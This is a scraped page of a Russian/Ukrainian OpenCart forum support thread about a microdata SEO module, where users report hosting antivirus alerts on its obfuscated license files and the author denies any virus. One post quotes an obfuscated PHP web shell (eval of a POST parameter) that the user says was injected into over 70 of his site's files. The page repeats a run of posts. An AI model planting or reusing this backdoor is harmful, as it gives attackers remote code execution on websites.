search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
meduzov Опубліковано: 13 жовтня 2015 Share Опубліковано: 13 жовтня 2015 Странно что в ЛС не можете написать. Я вам в скайпе ответил. Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 14 жовтня 2015 Автор Share Опубліковано: 14 жовтня 2015 Спасибо, ключ получил, но нужна ваша помощь, так как не все работает. Ящик почистил немного, так что можете писать в личку (ну или в Skype) Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... Onlineserfing Опубліковано: 4 листопада 2015 Share Опубліковано: 4 листопада 2015 запрос на активацию не прошел. письмо вернулось. в ЛС сейчас скину Надіслати Поділитися на інших сайтах More sharing options... Onlineserfing Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус?? Здравствуйте!Вас приветствует Регистратор доменных имён REG.RU!Вы являетесь владельцем услуги хостинга u00ХХХХХХ .Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.Наши рекомендации по решению проблемы:https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhenРезультат проверки антивируса Virusdie:{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php--С уважением,Регистратор доменных имён REG.RU Надіслати Поділитися на інших сайтах More sharing options... 19th Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус??не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 9 листопада 2015 Автор Share Опубліковано: 9 листопада 2015 не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование) Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... emilbazilio Опубліковано: 20 листопада 2015 Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Onlineserfing Опубліковано: 4 листопада 2015 Share Опубліковано: 4 листопада 2015 запрос на активацию не прошел. письмо вернулось. в ЛС сейчас скину Надіслати Поділитися на інших сайтах More sharing options...
Onlineserfing Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус?? Здравствуйте!Вас приветствует Регистратор доменных имён REG.RU!Вы являетесь владельцем услуги хостинга u00ХХХХХХ .Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.Наши рекомендации по решению проблемы:https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhenРезультат проверки антивируса Virusdie:{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php--С уважением,Регистратор доменных имён REG.RU Надіслати Поділитися на інших сайтах More sharing options...
19th Опубліковано: 5 листопада 2015 Share Опубліковано: 5 листопада 2015 В архиве вирус??не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 9 листопада 2015 Автор Share Опубліковано: 9 листопада 2015 не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля. Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование) Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... emilbazilio Опубліковано: 20 листопада 2015 Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция 